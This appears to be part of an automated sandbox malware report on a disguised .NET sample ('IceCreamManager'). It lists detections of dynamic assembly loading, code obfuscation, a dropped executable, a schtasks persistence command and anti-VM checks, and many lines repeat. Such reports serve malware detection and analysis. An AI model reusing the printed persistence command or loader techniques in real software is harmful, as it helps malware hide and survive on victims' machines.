Source: 8.0.iuvRyl9i7D.exe.2f0000.2.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.3.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.9.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.2.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.2.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 12.0.iuvRyl9i7D.exe.590000.5.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
.NET source code contains method to dynamically call methods (often used by packers)
Source: iuvRyl9i7D.exe, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: dDqpEdJEtzi.exe.0.dr, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 0.0.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 0.2.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.2.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.2.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.3.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 8.0.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.9.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.2.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.2.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Source: 12.0.iuvRyl9i7D.exe.590000.5.unpack, IceCreamManager/View/MainForm.cs .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00409023 push esi; iretd 12_2_0040902F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00416B91 push edx; retf 12_2_00416B92
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00417423 push es; retf 12_2_00417424
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D672 push eax; ret 12_2_0041D678
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D67B push eax; ret 12_2_0041D6E2
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D625 push eax; ret 12_2_0041D678
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D6DC push eax; ret 12_2_0041D6E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0463D0D1 push ecx; ret 21_2_0463D0E4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00609023 push esi; iretd 21_2_0060902F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00616B91 push edx; retf 21_2_00616B92
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00617423 push es; retf 21_2_00617424
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061D672 push eax; ret 21_2_0061D678
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061D67B push eax; ret 21_2_0061D6E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061D625 push eax; ret 21_2_0061D678
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061D6DC push eax; ret 21_2_0061D6E2
Source: initial sample Static PE information: section name: .text entropy: 7.63421102824
Source: initial sample Static PE information: section name: .text entropy: 7.63421102824
Drops PE files
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iuvRyl9i7D.exe PID: 4928, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
